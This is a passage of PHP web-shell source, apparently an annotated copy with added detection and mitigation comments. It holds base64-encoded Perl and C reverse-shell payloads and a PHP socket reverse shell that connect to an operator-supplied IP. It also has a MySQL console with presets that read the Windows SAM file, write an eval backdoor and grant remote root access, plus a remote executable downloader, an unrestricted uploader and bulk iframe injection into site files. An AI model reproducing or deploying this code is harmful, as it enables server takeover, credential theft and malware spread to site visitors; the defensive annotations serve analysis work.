			"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI". 
 
			"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi". 
 
			"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl". 
 
			"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; 
 
			echo File_Write('/tmp/envl_bc',base64_decode($back_connect_pl),'wb') ? '/tmp/envl_bc<br>' : '/tmp/envl_bc<br>'; 
 
			$perlpath = Exec_Run('which perl'); 
 
			$perlpath = $perlpath ? chop($perlpath) : 'perl'; 
 
			@unlink('/tmp/envl_bc.c'); 
 
			echo Exec_Run($perlpath.' /tmp/envl_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -vv -l '.$_POST['yourport'] : ''; 
 
		} 
 
		if($_POST['use'] == 'c') 
 
		{ 
 
			$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC". 
 
			"BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb". 
 
			"SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd". 
 
			"KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ". 
 
			"sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC". 
 
			"Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D". 
 
			"QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIERROR! 
GR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp". 
 
			"Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; 
 
			echo File_Write('/tmp/envl_bc.c',base64_decode($back_connect_c),'wb') ? '/tmp/envl_bc.c<br>' : '/tmp/envl_bc.c<br>'; 
 
			$res = Exec_Run('gcc -o /tmp/envl_bc /tmp/envl_bc.c'); 
 
			@unlink('/tmp/envl_bc.c'); 
 
			echo Exec_Run('/tmp/envl_bc '.$_POST['yourip'].' '.$_POST['yourport'].' &') ? 'nc -vv -l '.$_POST['yourport'] : ''; 
 
		} 
 
		if($_POST['use'] == 'php') 
 
		{ 
 
		if(!extension_loaded('sockets')) 
 
           { 
 
	        if ($system == 'WIN') { 
 
		        @dl('php_sockets.dll') or die("Can't load socket"); 
 
	        }else{ 
 
	    	    @dl('sockets.so') or die("Can't load socket"); 
 
	        } 
 
           } 
 
		   if($system=="WIN") 
 
           { 
 
         	$env=array('path' => 'c:\\windows\\system32'); 
 
            }else{ 
 
	        $env = array('PATH' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin'); 
 
           } 
 
           $descriptorspec = array( 
 
         	0 => array("pipe","r"), 
 
	        1 => array("pipe","w"), 
 
	        2 => array("pipe","w"), 
 
           ); 
 
		   $host = $_POST['yourip']; 
 
       	   $port = $_POST['yourport']; 
 
           $host=gethostbyname($host); 
 
           $proto=getprotobyname("tcp"); 
 
           if(($sock=socket_create(AF_INET,SOCK_STREAM,$proto))<0){ 
 
             die("Socket"); 
 
           } 
 
           if(($ret=socket_connect($sock,$host,$port))<0){ 
 
             die(""); 
 
           }else{ 
 
             $message="----------------------PHP--------------------\n"; 
 
             socket_write($sock,$message,strlen($message)); 
 
             $cwd=str_replace('\\','/',dirname(__FILE__)); 
 
             while($cmd=socket_read($sock,65535,$proto)){ 
 
                if(trim(strtolower($cmd))=="exit"){ 
 
                   socket_write($sock,"Bye\n"); 
 
                   exit; 
 
                }else{ 
 
                   $process = proc_open($cmd, $descriptorspec, $pipes, $cwd, $env); 
 
                   if (is_resource($process)) { 
 
	                fwrite($pipes[0], $cmd); 
 
	                fclose($pipes[0]); 
 
	                $msg=stream_get_contents($pipes[1]); 
 
	                socket_write($sock,$msg,strlen($msg)); 
 
	                fclose($pipes[1]); 
 
	                $msg=stream_get_contents($pipes[2]); 
 
	                socket_write($sock,$msg,strlen($msg)); 
 
	                $return_value = proc_close($process); 
 
                   } 
 
                } 
 
		   } 
 
		  } 
 
		} 
 
		if($_POST['use'] == 'nc') 
 
		{ 
 
	     echo '<div class="actall">'; 
 
		 $mip=$_POST['yourip']; 
 
		 $bport=$_POST['yourport']; 
 
		 $fp=fsockopen($mip , $bport , $errno, $errstr); 
 
		 if (!$fp){ 
 
		     $result = "Error: could not open socket connection"; 
 
		    }else { 
 
		 fputs ($fp ,"\n*********************************************\n  
 
		              hacking url:http://www.google.com is ok!         
 
			          \n*********************************************\n\n"); 
 
	     while(!feof($fp)){  
 
         fputs ($fp," [r00t@H4c3ing:/root]# "); 
 
         $result= fgets ($fp, 4096); 
 
         $message=`$result`; 
 
         fputs ($fp,"--> ".$message."\n"); 
 
                          } 
 
         fclose ($fp); 
 
		       } 
 
         echo '</div>'; 
 
		} 
 
 
 
		echo '<br> (nc -vv -l '.$_POST['yourport'].') '; 
 
	} 
 
break; 
 
 
 
	case "sqlshell": 
 
	$MSG_BOX = ''; 
 
	$mhost = 'localhost'; $muser = 'root'; $mport = '3306'; $mpass = ''; $mdata = 'mysql'; $msql = 'select version();'; 
 
	if(isset($_POST['mhost']) && isset($_POST['muser'])) 
 
	{ 
 
		$mhost = $_POST['mhost']; $muser = $_POST['muser']; $mpass = $_POST['mpass']; $mdata = $_POST['mdata']; $mport = $_POST['mport']; 
 
		if($conn = mysql_connect($mhost.':'.$mport,$muser,$mpass)) @mysql_select_db($mdata); 
 
		else $MSG_BOX = 'MYSQL'; 
 
	} 
 
	$downfile = 'c:/windows/repair/sam'; 
 
	if(!empty($_POST['downfile'])) 
 
	{ 
 
		$downfile = File_Str($_POST['downfile']); 
 
		$binpath = bin2hex($downfile); 
 
		$query = 'select load_file(0x'.$binpath.')'; 
 
		if($result = @mysql_query($query,$conn)) 
 
		{ 
 
			$k = 0; $downcode = ''; 
 
			while($row = @mysql_fetch_array($result)){$downcode .= $row[$k];$k++;} 
 
			$filedown = basename($downfile); 
 
			if(!$filedown) $filedown = 'envl.tmp'; 
 
			$array = explode('.', $filedown); 
 
			$arrayend = array_pop($array); 
 
			header('Content-type: application/x-'.$arrayend); 
 
			header('Content-Disposition: attachment; filename='.$filedown); 
 
			header('Content-Length: '.strlen($downcode)); 
 
			echo $downcode; 
 
			exit; 
 
		} 
 
		else $MSG_BOX = ''; 
 
	} 
 
	$o = isset($_GET['o']) ? $_GET['o'] : ''; 
 
print<<<END 
 
<script language="javascript"> 
 
function nFull(i){ 
 
	Str = new Array(11); 
 
	Str[0] = "select version();"; 
 
	Str[1] = "select load_file(0x633A5C5C77696E646F77735C73797374656D33325C5C696E65747372765C5C6D657461626173652E786D6C) FROM user into outfile 'D:/web/iis.txt'"; 
 
	Str[2] = "select '<?php eval(\$_POST[cmd]);?>' into outfile 'F:/web/bak.php';"; 
 
	Str[3] = "GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;"; 
 
	nform.msql.value = Str[i]; 
 
	return true; 
 
} 
 
END; 
 
html_base(); 
 
print<<<END 
 
function SubmitUrl(){ 
 
			document.getElementById('msql').value = base64encode(document.getElementById('msql').value); 
 
			document.getElementById('nform').submit(); 
 
} 
 
</script> 
 
<form method="POST" name="nform" id="nform"> 
 
<center><div class="actall"><a href="?eanver=sqlshell">[MYSQL]</a>  
 
<a href="?eanver=sqlshell&o=u">[MYSQL]</a>  
 
<a href="?eanver=sqlshell&o=d">[MYSQL]</a></div> 
 
<div class="actall"> 
 
 <input type="text" name="mhost" value="{$mhost}" style="width:110px"> 
 
 <input type="text" name="mport" value="{$mport}" style="width:110px"> 
 
 <input type="text" name="muser" value="{$muser}" style="width:110px"> 
 
 <input type="text" name="mpass" value="{$mpass}" style="width:110px"> 
 
 <input type="text" name="mdata" value="{$mdata}" style="width:110px"> 
 
</div> 
 
<div class="actall" style="height:220px;"> 
 
END; 
 
if($o == 'u') 
 
{ 
 
	// File write through the database: an uploaded file is hex-encoded,
	// inserted into a scratch table named `a`, written to $uppath on the
	// database host with SELECT ... INTO DUMPFILE, and the table is dropped.
	// The default destination is a .vbs file under the All Users profile;
	// the path segments between the slashes appear to have been lost in
	// decoding.
	// Detection: INTO DUMPFILE statements and short-lived tables in DB audit
	// logs; new files created by the MySQL service account.
	// Mitigation: no FILE privilege for application accounts and a
	// restrictive secure_file_priv.
	$uppath = 'C:/Documents and Settings/All Users////exp.vbs'; 
 
	if(!empty($_POST['uppath'])) 
 
	{ 
 
		// Destination path comes straight from the POST body and is
		// concatenated into the statement below without escaping.
		$uppath = $_POST['uppath']; 
 
		$query = 'Create TABLE a (cmd text NOT NULL);'; 
 
		if(@mysql_query($query,$conn)) 
 
		{ 
 
			// File_Read / File_Up / File_Str are defined outside this excerpt.
			// The fallback branch stages the upload as upfile.tmp next to the
			// shell script and deletes it after reading.
			if($tmpcode = File_Read($_FILES['upfile']['tmp_name'])){$filecode = bin2hex(File_Read($tmpcode));} 
 
			else{$tmp = File_Str(dirname(myaddress)).'/upfile.tmp';if(File_Up($_FILES['upfile']['tmp_name'],$tmp)){$filecode = bin2hex(File_Read($tmp));@unlink($tmp);}} 
 
			$query = 'Insert INTO a (cmd) VALUES(CONVERT(0x'.$filecode.',CHAR));'; 
 
			if(@mysql_query($query,$conn)) 
 
			{ 
 
				$query = 'SELECT cmd FROM a INTO DUMPFILE \''.$uppath.'\';'; 
 
				$MSG_BOX = @mysql_query($query,$conn) ? '' : ''; 
 
			} 
 
			else $MSG_BOX = ''; 
 
			// Clean-up of the scratch table runs whether or not the write
			// succeeded.
			@mysql_query('Drop TABLE IF EXISTS a;',$conn); 
 
		} 
 
		else $MSG_BOX = ''; 
 
	} 
 
print<<<END 
 
<br><br> <input type="text" name="uppath" value="{$uppath}" style="width:500px"> 
 
<br><br> <input type="file" name="upfile" style="width:500px;height:22px;"> 
 
</div><div class="actall"><input type="submit" value="" style="width:80px;"> 
 
END; 
 
} 
 
elseif($o == 'd') 
 
{ 
 
print<<<END 
 
<br><br><br> <input type="text" name="downfile" value="{$downfile}" style="width:500px"> 
 
</div><div class="actall"><input type="submit" value="" style="width:80px;"> 
 
END; 
 
} 
 
else 
 
{ 
 
	// Free-form query box: the page script base64-encodes the statement in
	// the browser (SubmitUrl), and it is decoded here and executed verbatim.
	// The encoding has the effect of keeping SQL keywords out of the raw
	// POST body, so decode the `msql` field when reviewing captured requests.
	// The preset statements offered by nFull() in this page include
	// INTO OUTFILE and GRANT ALL PRIVILEGES, which are useful audit-log
	// signatures.
	if(!empty($_POST['msql'])) 
 
	{ 
 
		$msql = $_POST['msql']; 
 
		$msql = base64_decode($msql); 
 
		if($result = @mysql_query($msql,$conn)) 
 
		{ 
 
			$MSG_BOX = 'SQL<br>'; 
 
			$k = 0; 
 
			// Result values are appended to $MSG_BOX, which is echoed without
			// HTML escaping at the end of this arm.
			while($row = @mysql_fetch_array($result)){$MSG_BOX .= $row[$k];$k++;} 
 
		} 
 
		else $MSG_BOX .= mysql_error(); 
 
	} 
 
print<<<END 
 
<textarea name="msql" id="msql" style="width:700px;height:200px;">{$msql}</textarea></div> 
 
<div class="actall"> 
 
<select onchange="return nFull(options[selectedIndex].value)"> 
 
	<option value="0" selected></option> 
 
	<option value="1"></option> 
 
	<option value="2"></option> 
 
	<option value="3"></option> 
 
</select> 
 
<input type="button" value="" onclick="SubmitUrl();" style="width:80px;"> 
 
END; 
 
} 
 
	if($MSG_BOX != '') echo '</div><div class="actall">'.$MSG_BOX.'</div></center></form>'; 
 
	else echo '</div></center></form>'; 
 
	break; 
 
	 
 
    // Web-shell arm "downloader": fetch a remote URL from the server and save
    // it to an arbitrary local path. Both values come from the POST body; the
    // defaults name an .exe at a remote URL and a copy beside the shell script.
    case "downloader": 
 
	$Com_durl = isset($_POST['durl']) ? $_POST['durl'] : 'http://www.baidu.com/down/muma.exe'; 
 
	// File_Str is defined outside this excerpt.
	$Com_dpath= isset($_POST['dpath']) ? $_POST['dpath'] : File_Str(dirname(myaddress).'/muma.exe'); 
 
print<<<END 
 
	<form method="POST"> 
 
    <div class="actall"> <input name="durl" value="{$Com_durl}" type="text" style="width:600px;"></div> 
 
    <div class="actall"> <input name="dpath" value="{$Com_dpath}" type="text" style="width:600px;"></div> 
 
    <div class="actall"><input value="" type="submit" style="width:80px;"></div></form> 
 
END; 
 
	// Server-side fetch and write. file_get_contents() on an http(s) URL
	// depends on allow_url_fopen being enabled.
	// Detection: outbound HTTP from the web-server process followed by a new
	// file (often executable) appearing on disk.
	// Mitigation: disable allow_url_fopen where it is not needed, filter
	// egress from web servers, and keep the web root non-writable for the
	// PHP user.
	if((!empty($_POST['durl'])) && (!empty($_POST['dpath']))) 
 
	{ 
 
		echo '<div class="actall">'; 
 
		$contents = @file_get_contents($_POST['durl']); 
 
		if(!$contents) echo ''; 
 
		// File_Write is defined outside this excerpt; 'wb' is presumably an
		// fopen mode. The status strings printed here are empty in this
		// decoded copy.
		else echo File_Write($_POST['dpath'],$contents,'wb') ? '' : ''; 
 
		echo '</div>'; 
 
	} 
 
	break; 
 
 
 
	// Web-shell arm "issql": database browser. Credentials and endpoint from
	// the POST body are kept in the PHP session, i.e. they sit in the
	// server-side session store in clear text. During incident response,
	// session data on the host may therefore reveal which database accounts
	// the operator used.
	case "issql": 
 
	session_start(); 
 
  if($_POST['sqluser'] && $_POST['sqlpass']){ 
 
    $_SESSION['sql_user'] = $_POST['sqluser']; 
 
    $_SESSION['sql_password'] = $_POST['sqlpass']; 
 
  } 
 
  // Host and port fall back to localhost:3306 when not supplied.
  if($_POST['sqlhost']){$_SESSION['sql_host'] = $_POST['sqlhost'];} 
 
  else{$_SESSION['sql_host'] = 'localhost';} 
 
  if($_POST['sqlport']){$_SESSION['sql_port'] = $_POST['sqlport'];} 
 
  else{$_SESSION['sql_port'] = '3306';} 
 
  // Connect with the stored values. On failure the stored credentials are
  // cleared and the script stops after emitting a link back to the
  // sqlshell arm (html_a is defined outside this excerpt).
  if($_SESSION['sql_user'] && $_SESSION['sql_password']){ 
 
    if(!($sqlcon = @mysql_connect($_SESSION['sql_host'].':'.$_SESSION['sql_port'],$_SESSION['sql_user'],$_SESSION['sql_password']))){ 
 
      unset($_SESSION['sql_user'], $_SESSION['sql_password'], $_SESSION['sql_host'], $_SESSION['sql_port']); 
 
      die(html_a('?eanver=sqlshell','')); 
 
    } 
 
  } 
 
  else{ 
 
    die(html_a('?eanver=sqlshell','')); 
 
  } 
 
  // Enumeration and dump. Database, table and statement text all come from
  // the request and are concatenated into SQL and HTML without escaping.
  // Detection: SHOW DATABASES / SHOW TABLES / SHOW COLUMNS followed by an
  // unfiltered SELECT * from an application account is unusual for most
  // applications and worth alerting on in database audit logs.
  $query = mysql_query("SHOW DATABASES",$sqlcon); 
 
  html_n('<tr><td>:'); 
 
  // One link per database the account can see.
  while($db = mysql_fetch_array($query)) { 
 
		html_a('?eanver=issql&db='.$db['Database'],$db['Database']); 
 
		echo '&nbsp;&nbsp;'; 
 
	} 
 
  html_n('</td></tr>'); 
 
  if($_GET['db']){ 
 
  	css_js("3"); 
 
    mysql_select_db($_GET['db'], $sqlcon); 
 
    html_n('<tr><td><form method="POST" name="DbForm"><textarea name="sql" COLS="80" ROWS="3">'.$_POST['sql'].'</textarea><br>'); 
 
    html_select(array(0=>"--SQL--",7=>"",8=>"",9=>"",10=>"",11=>"",12=>"",13=>""),0,"onchange='return Full(options[selectedIndex].value)'"); 
 
    html_input("submit","doquery",""); 
 
    html_a("?eanver=issql&db=".$_GET['db'],$_GET['db']); 
 
    html_n('--->'); 
 
    html_a("?eanver=issql&db=".$_GET['db']."&table=".$_GET['table'],$_GET['table']); 
 
    html_n('</form><br>'); 
 
  	// Arbitrary statement from the POST body, executed as-is (not
  	// base64-wrapped in this arm); only success or the error text is shown.
  	if(!empty($_POST['sql'])){ 
 
			if (@mysql_query($_POST['sql'],$sqlcon)) { 
 
				echo "SQL"; 
 
			}else{ 
 
				echo ": ".mysql_error(); 
 
			} 
 
  	} 
 
    // With a table selected: column names become the header row, then every
    // row of the table is rendered into the page.
    if($_GET['table']){ 
 
      html_n('<table border=1><tr>'); 
 
      $query = "SHOW COLUMNS FROM ".$_GET['table']; 
 
      $result = mysql_query($query,$sqlcon); 
 
      $fields = array(); 
 
      while($row = mysql_fetch_assoc($result)){ 
 
        array_push($fields,$row['Field']); 
 
        html_n('<td><font color=#FFFF44>'.$row['Field'].'</font></td>'); 
 
      } 
 
      html_n('</tr><tr>'); 
 
      $result = mysql_query("SELECT * FROM ".$_GET['table'],$sqlcon) or die(mysql_error()); 
 
      while($text = @mysql_fetch_assoc($result)){ 
 
      	foreach($fields as $row){ 
 
      		// Empty values are displayed as the literal text NULL.
      		if($text[$row] == "") $text[$row] = 'NULL'; 
 
      		html_n('<td>'.$text[$row].'</td>'); 
 
      	} 
 
      	echo '</tr>'; 
 
      } 
 
    } 
 
    // Without a table selected: list the tables of the chosen database as
    // links.
    else{ 
 
      $query = "SHOW TABLES FROM" . $_GET['db']; 
 
      $dat = mysql_query($query, $sqlcon) or die(mysql_error()); 
 
      while ($row = mysql_fetch_row($dat)){ 
 
        html_n("<tr><td><a href='?eanver=issql&db=".$_GET['db']."&table=".$row[0]."'>".$row[0]."</a></td></tr>"); 
 
      } 
 
    } 
 
  } 
 
	break; 
 
	 
 
    // Second `case "downloader"` label. Assuming it belongs to the same
    // switch as the earlier one (the switch header is outside this excerpt),
    // PHP runs the first matching label, so this copy is never reached.
    // Worth noting when diffing variants of this shell.
    case "downloader": 
 
	$Com_durl = isset($_POST['durl']) ? $_POST['durl'] : 'http://www.baidu.com/down/muma.exe'; 
 
	$Com_dpath= isset($_POST['dpath']) ? $_POST['dpath'] : File_Str(dirname(myaddress).'/muma.exe'); 
 
print<<<END 
 
	<form method="POST"> 
 
    <div class="actall"> <input name="durl" value="{$Com_durl}" type="text" style="width:600px;"></div> 
 
    <div class="actall"> <input name="dpath" value="{$Com_dpath}" type="text" style="width:600px;"></div> 
 
    <div class="actall"><input value="" type="submit" style="width:80px;"></div></form> 
 
END; 
 
	if((!empty($_POST['durl'])) && (!empty($_POST['dpath']))) 
 
	{ 
 
		echo '<div class="actall">'; 
 
		$contents = @file_get_contents($_POST['durl']); 
 
		if(!$contents) echo ''; 
 
		else echo File_Write($_POST['dpath'],$contents,'wb') ? '' : ''; 
 
		echo '</div>'; 
 
	} 
 
	break; 
 
 
 
	// Second `case "issql"` label. Assuming it belongs to the same switch as
	// the earlier one (the switch header is outside this excerpt), PHP runs
	// the first matching label, so this copy is never reached.
	case "issql": 
 
	session_start(); 
 
  if($_POST['sqluser'] && $_POST['sqlpass']){ 
 
    $_SESSION['sql_user'] = $_POST['sqluser']; 
 
    $_SESSION['sql_password'] = $_POST['sqlpass']; 
 
  } 
 
  if($_POST['sqlhost']){$_SESSION['sql_host'] = $_POST['sqlhost'];} 
 
  else{$_SESSION['sql_host'] = 'localhost';} 
 
  if($_POST['sqlport']){$_SESSION['sql_port'] = $_POST['sqlport'];} 
 
  else{$_SESSION['sql_port'] = '3306';} 
 
  if($_SESSION['sql_user'] && $_SESSION['sql_password']){ 
 
    if(!($sqlcon = @mysql_connect($_SESSION['sql_host'].':'.$_SESSION['sql_port'],$_SESSION['sql_user'],$_SESSION['sql_password']))){ 
 
      unset($_SESSION['sql_user'], $_SESSION['sql_password'], $_SESSION['sql_host'], $_SESSION['sql_port']); 
 
      die(html_a('?eanver=sqlshell','')); 
 
    } 
 
  } 
 
  else{ 
 
    die(html_a('?eanver=sqlshell','')); 
 
  } 
 
  $query = mysql_query("SHOW DATABASES",$sqlcon); 
 
  html_n('<tr><td>:'); 
 
  while($db = mysql_fetch_array($query)) { 
 
		html_a('?eanver=issql&db='.$db['Database'],$db['Database']); 
 
		echo '&nbsp;&nbsp;'; 
 
	} 
 
  html_n('</td></tr>'); 
 
  if($_GET['db']){ 
 
  	css_js("3"); 
 
    mysql_select_db($_GET['db'], $sqlcon); 
 
    html_n('<tr><td><form method="POST" name="DbForm" id="DbForm"><textarea name="sql" id="sql" COLS="80" ROWS="3">'.$_POST['sql'].'</textarea><br>'); 
 
    html_select(array(0=>"--SQL--",7=>"",8=>"",9=>"",10=>"",11=>"",12=>"",13=>""),0,"onchange='return Full(options[selectedIndex].value)'"); 
 
    html_input("submit","doquery",""); 
 
    html_a("?eanver=issql&db=".$_GET['db'],$_GET['db']); 
 
    html_n('--->'); 
 
    html_a("?eanver=issql&db=".$_GET['db']."&table=".$_GET['table'],$_GET['table']); 
 
    html_n('</form><br>'); 
 
  	if(!empty($_POST['sql'])){ 
 
			if (@mysql_query($_POST['sql'],$sqlcon)) { 
 
				echo "SQL"; 
 
			}else{ 
 
				echo ": ".mysql_error(); 
 
			} 
 
  	} 
 
    if($_GET['table']){ 
 
      html_n('<table border=1><tr>'); 
 
      $query = "SHOW COLUMNS FROM ".$_GET['table']; 
 
      $result = mysql_query($query,$sqlcon); 
 
      $fields = array(); 
 
      while($row = mysql_fetch_assoc($result)){ 
 
        array_push($fields,$row['Field']); 
 
        html_n('<td><font color=#FFFF44>'.$row['Field'].'</font></td>'); 
 
      } 
 
      html_n('</tr><tr>'); 
 
      $result = mysql_query("SELECT * FROM ".$_GET['table'],$sqlcon) or die(mysql_error()); 
 
      while($text = @mysql_fetch_assoc($result)){ 
 
      	foreach($fields as $row){ 
 
      		if($text[$row] == "") $text[$row] = 'NULL'; 
 
      		html_n('<td>'.$text[$row].'</td>'); 
 
      	} 
 
      	echo '</tr>'; 
 
      } 
 
    } 
 
    else{ 
 
      $query = "SHOW TABLES FROM " . $_GET['db']; 
 
      $dat = mysql_query($query, $sqlcon) or die(mysql_error()); 
 
      while ($row = mysql_fetch_row($dat)){ 
 
    html_n("<tr><td><a href='?eanver=issql&db=".$_GET['db']."&table=".$row[0]."'>".$row[0]."</a></td></tr>"); 
 
      } 
 
    } 
 
  } 
 
	break; 
 
	 
 
	case "upfiles": 
 
	html_n('<tr><td>: '.@get_cfg_var('upload_max_filesize').'<form method="POST" enctype="multipart/form-data">'); 
 
	html_input("text","uppath",root_dir,"<br>: ","51"); 
 
print<<<END 
 
<SCRIPT language="JavaScript"> 
 
function addTank(){ 
 
var k=0; 
 
  k=k+1; 
 
  k=tank.rows.length; 
 
  newRow=document.all.tank.insertRow(-1) 
 
  <!----> 
 
  newcell=newRow.insertCell() 
 
  newcell.innerHTML="<input name='tankNo' type='checkbox'> <input type='file' name='upfile[]' value='' size='50'>" 
 
} 
 
 
 
function delTank() { 
 
  if(tank.rows.length==1) return; 
 
  var checkit = false; 
 
  for (var i=0;i<document.all.tankNo.length;i++) { 
 
    if (document.all.tankNo[i].checked) { 
 
      checkit=true; 
 
      tank.deleteRow(i+1); 
 
      i--; 
 
    } 
 
  } 
 
  if (checkit) { 
 
  } else{ 
 
    alert(""); 
 
    return false; 
 
  } 
 
} 
 
</SCRIPT> 
 
<br><br> 
 
<table cellSpacing=0 cellPadding=0 width="100%" border=0>        
 
          <tr> 
 
            <td width="7%"><input class="button01" type="button"  onclick="addTank()" value="   " name="button2"/> 
 
            <input name="button3"  type="button" class="button01" onClick="delTank()" value="" /> 
 
            </td> 
 
          </tr> 
 
</table> 
 
<table  id="tank" width="100%" border="0" cellpadding="1" cellspacing="1" > 
 
<tr><td></td></tr> 
 
<tr><td><input name='tankNo' type='checkbox'> <input type='file' name='upfile[]' value='' size='50'></td></tr> 
 
</table> 
 
END; 
 
	html_n('<br><input type="submit" name="upfiles" value="" style="width:80px;"> <input type="button" value="" onclick="window.location=\'?eanver=main&path='.root_dir.'\';" style="width:80px;">'); 
 
	// Multi-file upload handler: each uploaded file is written to the POSTed
	// directory under its client-supplied name. No extension, type or path
	// check is visible here (str_path is defined outside this excerpt).
	// Detection: file-integrity monitoring on the web root.
	// Mitigation: no script execution in directories the PHP user can write.
	if($_POST['upfiles']){ 
 
		foreach ($_FILES["upfile"]["error"] as $key => $error){ 
 
			if ($error == UPLOAD_ERR_OK){ 
 
				$tmp_name = $_FILES["upfile"]["tmp_name"][$key]; 
 
				$name = $_FILES["upfile"]["name"][$key]; 
 
				$uploadfile = str_path($_POST['uppath'].'/'.$name); 
 
				// NOTE(review): an unparenthesised nested ternary is
				// left-associative before PHP 8 and a fatal compile error
				// from PHP 8.0 on, so this file does not parse on PHP 8+.
				// $msg is not defined anywhere in this excerpt.
				$upload = @copy($tmp_name,$uploadfile) ? $name.$msg[2] : @move_uploaded_file($tmp_name,$uploadfile) ? $name.$msg[2] : $name.$msg[3]; 
 
				echo '<br><br>'.$upload; 
 
			} 
 
		} 
 
	} 
 
	html_n('</form>'); 
 
	break; 
 
	 
 
	// Web-shell arm "guama": bulk modification of web content. It collects a
	// directory, a '|'-separated list of file extensions and an HTML snippet
	// (default: a 1x1 iframe), then hands them to do_passreturn(), which is
	// defined outside this excerpt. Presumably the helper inserts or removes
	// the snippet in matching files, with the mode taken from the radio
	// values "guama"/"qingma" and the 'pass' checkbox controlling
	// sub-directory traversal; confirm against the helper.
	// Detection: compare web-root files with a known-good baseline and search
	// served pages for tiny or hidden iframes.
	case "guama": 
 
	$patht = isset($_POST['path']) ? $_POST['path'] : root_dir; 
 
	$typet = isset($_POST['type']) ? $_POST['type'] : ".html|.shtml|.htm|.asp|.php|.jsp|.cgi|.aspx"; 
 
	$codet = isset($_POST['code']) ? $_POST['code'] : "<iframe src=\"http://localhost/eanver.htm\" width=\"1\" height=\"1\"></iframe>"; 
 
	// Form rendering; the html_* helpers are defined outside this excerpt.
	html_n('<tr><td>"|",.<form method="POST"><br>'); 
 
	html_input("text","path",$patht,"","45"); 
 
	html_input("checkbox","pass","","","",true); 
 
	html_input("text","type",$typet,"<br><br>","60"); 
 
	html_text("code","67","5",$codet); 
 
	html_n('<br><br>'); 
 
	html_radio("","","guama","qingma"); 
 
	html_input("submit","passreturn",""); 
 
	html_n('</td></tr></form>'); 
 
	// The action runs only when a path was posted; the mode string is taken
	// from $_POST['return'].
	if(!empty($_POST['path'])){ 
 
		html_n('<tr><td>:<br><br>'); 
 
		if(isset($_POST['pass'])) $bool = true; else $bool = false; 
 
		do_passreturn($patht,$codet,$_POST['return'],$bool,$typet); 
 
	} 
 
	break; 
 
	 
 
	// Web-shell arm "tihuan": passes a directory plus two text blocks
	// (newcode / oldcode) to do_passreturn() with the fixed mode "tihuan".
	// The helper is defined outside this excerpt; presumably this is a bulk
	// search-and-replace across files under the path. Confirm against the
	// helper.
	// Detection: many web files with near-identical modification times.
	case "tihuan": 
 
	html_n('<tr><td>,.<br><br><form method="POST">'); 
 
	html_input("text","path",root_dir,"","45"); 
 
	html_input("checkbox","pass","","","",true); 
 
	html_text("newcode","67","5",$_POST['newcode']); 
 
	html_n('<br><br>'); 
 
	html_text("oldcode","67","5",$_POST['oldcode']); 
 
	html_input("submit","passreturn","","<br><br>"); 
 
	html_n('</td></tr></form>'); 
 
	if(!empty($_POST['path'])){ 
 
		html_n('<tr><td>:<br><br>'); 
 
		if(isset($_POST['pass'])) $bool = true; else $bool = false; 
 
		do_passreturn($_POST['path'],$_POST['newcode'],"tihuan",$bool,$_POST['oldcode']); 
 
	} 
 
	break; 
 
	 
 
	// Web-shell arm "scanfile": takes a directory and a search string and
	// passes them to do_passreturn() with a mode from $_POST['return'] (the
	// radio values are "scanfile"/"scancode"). The select list names common
	// CMS packages and the page text mentions MYSQL, so this presumably
	// hunts for files holding database settings; the helper is outside this
	// excerpt, confirm there.
	// Defender: assume application config files and the credentials in them
	// were read if this shell was active; rotate database passwords.
	case "scanfile": 
css_js("4"); 
 
	html_n('<tr><td>MYSQL,.<br>,,.<form method="POST" name="sform"><br>'); 
 
	html_input("text","path",root_dir,"","45"); 
 
	html_input("checkbox","pass","","","",true); 
 
	html_input("text","code",$_POST['code'],"<br><br>","40"); 
 
	html_select(array("--MYSQL--","Discuz","PHPWind","phpcms","dedecms","PHPBB","wordpress","sa-blog","o-blog"),0,"onchange='return Fulll(options[selectedIndex].value)'"); 
 
	html_n('<br><br>'); 
 
	html_radio("","","scanfile","scancode"); 
 
	html_input("submit","passreturn",""); 
 
	html_n('</td></tr></form>'); 
 
	if(!empty($_POST['path'])){ 
 
		html_n('<tr><td>:<br><br>'); 
 
		if(isset($_POST['pass'])) $bool = true; else $bool = false; 
 
